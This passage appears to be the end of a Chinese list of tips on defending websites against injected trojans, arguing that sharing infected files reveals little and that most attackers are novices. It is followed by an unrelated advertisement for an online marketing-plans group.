9.有些朋友经常把中了马之后的文件上传到这个论坛然后希望大家一起研究，我想说“那个东西上传了也不能得到防止的方法，因为那个JS或者iframe并不是关键，你上传了大家只能去破解下加密文件的木马而已。”别人留下的东西只是目的而不是工具。 10.不可抗拒的自然因素，比如一个超级顶级黑客要挂你的网站，我怕很多没有毛病的东西都会有毛病了，相信我一句话，挂马的黑客都是一些菜鸟黑客和工具黑客，做好以上，那些黑客就不知道怎么做了。 网络营销方案圈子：包括SEO,SEM,电子邮件营销，数据库营销，论坛营销，短信营销，病毒式营销，电子杂志营销等1000多个营销方案，方案包括医疗、电商、学校、中小企业等各行各业，供大家学习交流。 圈子：99pan.com/quanzi/44356811